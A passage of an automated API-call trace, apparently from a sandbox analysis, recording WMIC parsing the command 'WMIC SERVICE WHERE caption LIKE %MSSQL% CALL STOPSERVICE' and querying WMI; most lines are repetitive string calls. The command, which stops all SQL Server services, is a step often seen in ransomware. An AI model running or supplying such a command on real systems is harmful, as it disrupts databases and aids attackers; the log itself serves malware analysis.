0x6 [0103.768] SysStringLen (param_1="LIST") returned 0x4 [0103.768] SysStringLen (param_1="LIST") returned 0x4 [0103.768] SysStringLen (param_1="RAWXML") returned 0x6 [0103.769] SysStringLen (param_1="HTABLE") returned 0x6 [0103.769] SysStringLen (param_1="TABLE") returned 0x5 [0103.769] SysStringLen (param_1="HTABLE") returned 0x6 [0103.769] SysStringLen (param_1="LIST") returned 0x4 [0103.769] SysStringLen (param_1="HFORM") returned 0x5 [0103.769] SysStringLen (param_1="TABLE") returned 0x5 [0103.769] SysStringLen (param_1="HFORM") returned 0x5 [0103.769] SysStringLen (param_1="LIST") returned 0x4 [0103.769] SysStringLen (param_1="HFORM") returned 0x5 [0103.769] SysStringLen (param_1="HTABLE") returned 0x6 [0103.770] SysStringLen (param_1="XML") returned 0x3 [0103.770] SysStringLen (param_1="TABLE") returned 0x5 [0103.770] SysStringLen (param_1="XML") returned 0x3 [0103.770] SysStringLen (param_1="VALUE") returned 0x5 [0103.770] SysStringLen (param_1="VALUE") returned 0x5 [0103.770] SysStringLen (param_1="XML") returned 0x3 [0103.770] SysStringLen (param_1="MOF") returned 0x3 [0103.770] SysStringLen (param_1="TABLE") returned 0x5 [0103.770] SysStringLen (param_1="MOF") returned 0x3 [0103.770] SysStringLen (param_1="LIST") returned 0x4 [0103.770] SysStringLen (param_1="MOF") returned 0x3 [0103.770] SysStringLen (param_1="RAWXML") returned 0x6 [0103.770] SysStringLen (param_1="LIST") returned 0x4 [0103.770] SysStringLen (param_1="MOF") returned 0x3 [0103.771] SysStringLen (param_1="CSV") returned 0x3 [0103.771] SysStringLen (param_1="TABLE") returned 0x5 [0103.771] SysStringLen (param_1="CSV") returned 0x3 [0103.771] SysStringLen (param_1="LIST") returned 0x4 [0103.771] SysStringLen (param_1="CSV") returned 0x3 [0103.771] SysStringLen (param_1="HTABLE") returned 0x6 [0103.771] SysStringLen (param_1="CSV") returned 0x3 [0103.771] SysStringLen (param_1="HFORM") returned 0x5 [0103.771] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0103.771] SysStringLen (param_1="TABLE") returned 0x5 [0103.771] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0103.771] SysStringLen (param_1="VALUE") returned 0x5 [0103.771] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0103.771] SysStringLen (param_1="XML") returned 0x3 [0103.771] SysStringLen (param_1="XML") returned 0x3 [0103.771] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0103.772] SysStringLen (param_1="texttablewsys") returned 0xd [0103.772] SysStringLen (param_1="TABLE") returned 0x5 [0103.772] SysStringLen (param_1="texttablewsys") returned 0xd [0103.772] SysStringLen (param_1="XML") returned 0x3 [0103.772] SysStringLen (param_1="texttablewsys") returned 0xd [0103.772] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0103.772] SysStringLen (param_1="XML") returned 0x3 [0103.772] SysStringLen (param_1="texttablewsys") returned 0xd [0103.772] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0103.772] SysStringLen (param_1="TABLE") returned 0x5 [0103.772] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0103.772] SysStringLen (param_1="XML") returned 0x3 [0103.772] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0103.772] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0103.772] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0103.772] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0103.773] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0103.773] SysStringLen (param_1="TABLE") returned 0x5 [0103.773] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0103.773] SysStringLen (param_1="XML") returned 0x3 [0103.773] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0103.773] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0103.773] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0103.773] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0103.773] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0103.773] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0103.773] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0103.773] SysStringLen (param_1="TABLE") returned 0x5 [0103.773] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0103.773] SysStringLen (param_1="XML") returned 0x3 [0103.773] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0103.773] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0103.773] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0103.773] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0103.774] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0103.774] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0103.774] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0103.774] SysStringLen (param_1="TABLE") returned 0x5 [0103.774] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0103.774] SysStringLen (param_1="XML") returned 0x3 [0103.774] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0103.774] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0103.774] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0103.774] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0103.774] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0103.774] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0103.774] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0103.774] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0103.775] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0103.775] SysStringLen (param_1="TABLE") returned 0x5 [0103.775] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0103.775] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0103.775] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0103.775] SysStringLen (param_1="XML") returned 0x3 [0103.775] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0103.775] SysStringLen (param_1="texttablewsys") returned 0xd [0103.775] SysStringLen (param_1="XML") returned 0x3 [0103.775] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0103.775] SysStringLen (param_1="htable-sortby") returned 0xd [0103.775] SysStringLen (param_1="TABLE") returned 0x5 [0103.775] SysStringLen (param_1="htable-sortby") returned 0xd [0103.775] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0103.775] SysStringLen (param_1="htable-sortby") returned 0xd [0103.775] SysStringLen (param_1="XML") returned 0x3 [0103.775] SysStringLen (param_1="htable-sortby") returned 0xd [0103.775] SysStringLen (param_1="texttablewsys") returned 0xd [0103.775] SysStringLen (param_1="htable-sortby") returned 0xd [0103.775] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0103.775] SysStringLen (param_1="XML") returned 0x3 [0103.775] SysStringLen (param_1="htable-sortby") returned 0xd [0103.776] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0103.776] SysStringLen (param_1="TABLE") returned 0x5 [0103.776] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0103.776] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0103.776] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0103.776] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0103.776] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0103.776] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0103.776] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0103.776] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0103.776] SysStringLen (param_1="wmiclimofformat") returned 0xf [0103.776] SysStringLen (param_1="TABLE") returned 0x5 [0103.776] SysStringLen (param_1="wmiclimofformat") returned 0xf [0103.776] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0103.776] SysStringLen (param_1="wmiclimofformat") returned 0xf [0103.776] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0103.776] SysStringLen (param_1="wmiclimofformat") returned 0xf [0103.776] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0103.776] SysStringLen (param_1="wmiclimofformat") returned 0xf [0103.776] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0103.776] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0103.776] SysStringLen (param_1="wmiclimofformat") returned 0xf [0103.777] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0103.777] SysStringLen (param_1="TABLE") returned 0x5 [0103.777] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0103.777] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0103.777] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0103.777] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0103.777] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0103.777] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0103.777] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0103.777] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0103.777] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0103.777] SysStringLen (param_1="TABLE") returned 0x5 [0103.777] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0103.777] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0103.777] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0103.777] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0103.778] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0103.778] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0103.778] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0103.778] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0103.778] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0103.778] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0103.778] FreeThreadedDOMDocument:IUnknown:Release (This=0xec45a8) returned 0x0 [0103.778] GetCommandLineW () returned="WMIC SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL STOPSERVICE" [0103.778] memcpy_s (in: _Destination=0xf48040, _DestinationSize=0x7e, _Source=0xcb1588, _SourceSize=0x7a | out: _Destination=0xf48040) returned 0x0 [0103.778] GetLocalTime (in: lpSystemTime=0xa4fb24 | out: lpSystemTime=0xa4fb24*(wYear=0x7e2, wMonth=0x4, wDayOfWeek=0x0, wDay=0xf, wHour=0xa, wMinute=0x8, wSecond=0x38, wMilliseconds=0x27c)) [0103.778] _vsnwprintf (in: _Buffer=0xf480c8, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0xa4fb04 | out: _Buffer="04-15-2018T10:08:56") returned 19 [0103.778] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL STOPSERVICE") returned 57 [0103.778] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL STOPSERVICE") returned 57 [0103.778] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL STOPSERVICE") returned 57 [0103.778] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL STOPSERVICE") returned 57 [0103.778] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL STOPSERVICE") returned 57 [0103.778] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL STOPSERVICE") returned 57 [0103.778] lstrlenW (lpString="SERVICE") returned 7 [0103.778] _wcsicmp (_String1="SERVICE", _String2="\"NULL\"") returned 81 [0103.779] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL STOPSERVICE") returned 57 [0103.779] lstrlenW (lpString="WHERE") returned 5 [0103.779] _wcsicmp (_String1="WHERE", _String2="\"NULL\"") returned 85 [0103.779] memmove_s (in: _Destination=0xf42c78, _DestinationSize=0x4, _Source=0xf42c68, _SourceSize=0x4 | out: _Destination=0xf42c78) returned 0x0 [0103.779] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL STOPSERVICE") returned 57 [0103.779] lstrlenW (lpString="'caption LIKE '%MSSQL%''") returned 24 [0103.779] _wcsicmp (_String1="'caption LIKE '%MSSQL%''", _String2="\"NULL\"") returned 5 [0103.779] lstrlenW (lpString="'caption LIKE '%MSSQL%''") returned 24 [0103.779] lstrlenW (lpString="'caption LIKE '%MSSQL%''") returned 24 [0103.779] memmove_s (in: _Destination=0xf47ea8, _DestinationSize=0x8, _Source=0xf42c78, _SourceSize=0x8 | out: _Destination=0xf47ea8) returned 0x0 [0103.779] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL STOPSERVICE") returned 57 [0103.779] lstrlenW (lpString="CALL") returned 4 [0103.779] _wcsicmp (_String1="CALL", _String2="\"NULL\"") returned 65 [0103.779] memmove_s (in: _Destination=0xf47f98, _DestinationSize=0xc, _Source=0xf47ea8, _SourceSize=0xc | out: _Destination=0xf47f98) returned 0x0 [0103.779] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL STOPSERVICE") returned 57 [0103.779] lstrlenW (lpString="STOPSERVICE") returned 11 [0103.779] _wcsicmp (_String1="STOPSERVICE", _String2="\"NULL\"") returned 81 [0103.779] memmove_s (in: _Destination=0xf42398, _DestinationSize=0x10, _Source=0xf47f98, _SourceSize=0x10 | out: _Destination=0xf42398) returned 0x0 [0103.779] lstrlenW (lpString="QUIT") returned 4 [0103.779] lstrlenW (lpString="SERVICE") returned 7 [0103.779] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="QUIT", cchCount2=4) returned 3 [0103.779] lstrlenW (lpString="EXIT") returned 4 [0103.779] lstrlenW (lpString="SERVICE") returned 7 [0103.779] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="EXIT", cchCount2=4) returned 3 [0103.779] WbemLocator:IUnknown:AddRef (This=0xcc3330) returned 0x2 [0103.779] lstrlenW (lpString="/") returned 1 [0103.779] lstrlenW (lpString="SERVICE") returned 7 [0103.779] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="/", cchCount2=1) returned 3 [0103.779] lstrlenW (lpString="-") returned 1 [0103.780] lstrlenW (lpString="SERVICE") returned 7 [0103.780] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="-", cchCount2=1) returned 3 [0103.780] lstrlenW (lpString="CLASS") returned 5 [0103.780] lstrlenW (lpString="SERVICE") returned 7 [0103.780] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="CLASS", cchCount2=5) returned 3 [0103.780] lstrlenW (lpString="PATH") returned 4 [0103.780] lstrlenW (lpString="SERVICE") returned 7 [0103.780] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="PATH", cchCount2=4) returned 3 [0103.780] lstrlenW (lpString="CONTEXT") returned 7 [0103.780] lstrlenW (lpString="SERVICE") returned 7 [0103.780] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="CONTEXT", cchCount2=7) returned 3 [0103.780] lstrlenW (lpString="SERVICE") returned 7 [0103.780] lstrlenW (lpString="SERVICE") returned 7 [0103.780] GetCurrentThreadId () returned 0xc4c [0103.780] ??0CHString@@QAE@XZ () returned 0xa4fa78 [0103.780] WbemLocator:IWbemLocator:ConnectServer (in: This=0xcc3330, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349540 | out: ppNamespace=0x1349540*=0xce0a60) returned 0x0 [0103.801] CoSetProxyBlanket (pProxy=0xce0a60, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0103.801] ??1CHString@@QAE@XZ () returned 0x74a66430 [0103.801] GetCurrentThreadId () returned 0xc4c [0103.801] ??0CHString@@QAE@XZ () returned 0xa4fa20 [0103.802] SysStringLen (param_1="root\\cli") returned 0x8 [0103.802] SysStringLen (param_1="\\") returned 0x1 [0103.802] SysStringLen (param_1="root\\cli\\") returned 0x9 [0103.802] SysStringLen (param_1="ms_409") returned 0x6 [0103.802] WbemLocator:IWbemLocator:ConnectServer (in: This=0xcc3330, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349544 | out: ppNamespace=0x1349544*=0xce0c90) returned 0x0 [0103.808] ??1CHString@@QAE@XZ () returned 0x74a66430 [0103.808] GetCurrentThreadId () returned 0xc4c [0103.809] ??0CHString@@QAE@XZ () returned 0xa4fa7c [0103.809] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0103.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301478, cbMultiByte=-1, lpWideCharStr=0xf48a00, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0103.809] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0103.809] SysStringLen (param_1="SERVICE") returned 0x7 [0103.809] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='SERVICE") returned 0x23 [0103.809] SysStringLen (param_1="'") returned 0x1 [0103.809] IWbemServices:GetObject (in: This=0xce0a60, strObjectPath="MSFT_CliAlias.FriendlyName='SERVICE'", lFlags=0, pCtx=0x0, ppObject=0xa4fa78*=0x0, ppCallResult=0x0 | out: ppObject=0xa4fa78*=0xd054d0, ppCallResult=0x0) returned 0x0 [0103.814] IWbemClassObject:Get (in: This=0xd054d0, wszName="Target", lFlags=0, pVal=0xa4fa50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xa4fa50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_Service", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0103.814] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0103.814] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0103.815] IWbemClassObject:Get (in: This=0xd054d0, wszName="PWhere", lFlags=0, pVal=0xa4fa50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xa4fa50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WHERE Name='#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0103.815] lstrlenW (lpString="WHERE Name='#'") returned 14 [0103.815] lstrlenW (lpString="WHERE Name='#'") returned 14 [0103.815] IWbemClassObject:Get (in: This=0xd054d0, wszName="Connection", lFlags=0, pVal=0xa4fa50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xa4fa50*(varType=0xd, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xd05890, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0103.815] IUnknown:QueryInterface (in: This=0xd05890, riid=0x13069ac*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0xa4fa6c | out: ppvObject=0xa4fa6c*=0xd05890) returned 0x0 [0103.815] GetCurrentThreadId () returned 0xc4c [0103.815] ??0CHString@@QAE@XZ () returned 0xa4f9ec [0103.815] IWbemClassObject:Get (in: This=0xd05890, wszName="Namespace", lFlags=0, pVal=0xa4f9d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xa4f9d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0103.815] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0103.815] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0103.815] IWbemClassObject:Get (in: This=0xd05890, wszName="Locale", lFlags=0, pVal=0xa4f9d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xce6d3c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xa4f9d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0103.815] lstrlenW (lpString="ms_409") returned 6 [0103.815] lstrlenW (lpString="ms_409") returned 6 [0103.815] IWbemClassObject:Get (in: This=0xd05890, wszName="User", lFlags=0, pVal=0xa4f9d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xce6d3c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xa4f9d0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0103.815] IWbemClassObject:Get (in: This=0xd05890, wszName="Password", lFlags=0, pVal=0xa4f9d0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xa4f9d0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0103.816] IWbemClassObject:Get (in: This=0xd05890, wszName="Server", lFlags=0, pVal=0xa4f9d0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xa4f9d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0103.816] lstrlenW (lpString=".") returned 1 [0103.816] lstrlenW (lpString=".") returned 1 [0103.816] IWbemClassObject:Get (in: This=0xd05890, wszName="Authority", lFlags=0, pVal=0xa4f9d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xce6d3c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xa4f9d0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0103.816] ??1CHString@@QAE@XZ () returned 0x74a66430 [0103.816] IUnknown:Release (This=0xd05890) returned 0x1 [0103.816] GetCurrentThreadId () returned 0xc4c [0103.816] ??0CHString@@QAE@XZ () returned 0xa4f9dc [0103.816] IWbemClassObject:Get (in: This=0xd054d0, wszName="__RELPATH", lFlags=0, pVal=0xa4f9c4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xa4f9c4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"Service\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0103.816] GetCurrentThreadId () returned 0xc4c [0103.816] ??0CHString@@QAE@XZ () returned 0xa4f958 [0103.816] ??0CHString@@QAE@PBG@Z () returned 0xa4f954 [0103.816] ??0CHString@@QAE@ABV0@@Z () returned 0xa4f8d4 [0103.816] ?Empty@CHString@@QAEXXZ () returned 0x74a66430 [0103.816] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0xf48a00 [0103.816] ?Find@CHString@@QBEHPBG@Z () returned 0x1b [0103.816] ?Left@CHString@@QBE?AV1@H@Z () returned 0xa4f8cc [0103.816] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0xa4f8d0 [0103.816] ??YCHString@@QAEABV0@ABV0@@Z () returned 0xa4f954 [0103.816] ??1CHString@@QAE@XZ () returned 0x1 [0103.816] ??1CHString@@QAE@XZ () returned 0x1 [0103.816] ?Mid@CHString@@QBE?AV1@H@Z () returned 0xa4f8c8 [0103.816] ??4CHString@@QAEABV0@ABV0@@Z () returned 0xa4f8d4 [0103.816] ??1CHString@@QAE@XZ () returned 0x1 [0103.816] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0xf48a60 [0103.816] ?Find@CHString@@QBEHPBG@Z () returned 0x7 [0103.816] ?Left@CHString@@QBE?AV1@H@Z () returned 0xa4f8cc [0103.816] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0xa4f8d0 [0103.816] ??YCHString@@QAEABV0@ABV0@@Z () returned 0xa4f954 [0103.816] ??1CHString@@QAE@XZ () returned 0x1 [0103.816] ??1CHString@@QAE@XZ () returned 0x1 [0103.816] ?Mid@CHString@@QBE?AV1@H@Z () returned 0xa4f8c8 [0103.817] ??4CHString@@QAEABV0@ABV0@@Z () returned 0xa4f8d4 [0103.817] ??1CHString@@QAE@XZ () returned 0x74a66430 [0103.817] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x74a66424 [0103.817] ??1CHString@@QAE@XZ () returned 0x74a66430 [0103.817] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0103.817] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0103.817] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0103.817] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"Service\\\"") returned 0x26 [0103.817] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Service\\\"") returned 0x79 [0103.817] SysStringLen (param_1="\"") returned 0x1 [0103.817] IWbemServices:GetObject (in: This=0xce0c90, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Service\\\"\"", lFlags=0, pCtx=0x0, ppObject=0xa4f964*=0x0, ppCallResult=0x0 | out: ppObject=0xa4f964*=0xd05c70, ppCallResult=0x0) returned 0x0 [0103.819] IWbemClassObject:Get (in: This=0xd05c70, wszName="Text", lFlags=0, pVal=0xa4f930*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xa4f930*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xcf0350*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0xce3140, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0103.819] SafeArrayGetLBound (in: psa=0xcf0350, nDim=0x1, plLbound=0xa4f940 | out: plLbound=0xa4f940) returned 0x0 [0103.819] SafeArrayGetUBound (in: psa=0xcf0350, nDim=0x1, plUbound=0xa4f944 | out: plUbound=0xa4f944) returned 0x0 [0103.819] SafeArrayGetElement (in: psa=0xcf0350, rgIndices=0xa4f95c, pv=0xa4f948 | out: pv=0xa4f948) returned 0x0 [0103.819] SysStringLen (param_1="Service application management. ") returned 0x20 [0103.819] IUnknown:Release (This=0xd05c70) returned 0x0 [0103.819] ??1CHString@@QAE@XZ () returned 0x1 [0103.819] ??1CHString@@QAE@XZ () returned 0x74a66430 [0103.819] ??1CHString@@QAE@XZ () returned 0x74a66430 [0103.819] lstrlenW (lpString="Service application management. ") returned 32 [0103.819] lstrlenW (lpString="Service application management. ") returned 32 [0103.819] IUnknown:Release (This=0xd054d0) returned 0x0 [0103.820] ??1CHString@@QAE@XZ () returned 0x74a66430 [0103.820] lstrlenW (lpString="PATH") returned 4 [0103.820] lstrlenW (lpString="WHERE") returned 5 [0103.820] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WHERE", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3 [0103.820] lstrlenW (lpString="WHERE") returned 5 [0103.820] lstrlenW (lpString="WHERE") returned 5 [0103.820] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WHERE", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0103.820] lstrlenW (lpString="/") returned 1 [0103.820] lstrlenW (lpString="caption LIKE '%MSSQL%'") returned 22 [0103.820] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="caption LIKE '%MSSQL%'", cchCount1=22, lpString2="/", cchCount2=1) returned 3 [0103.820] lstrlenW (lpString="-") returned 1 [0103.820] lstrlenW (lpString="caption LIKE '%MSSQL%'") returned 22 [0103.820] CompareStringW 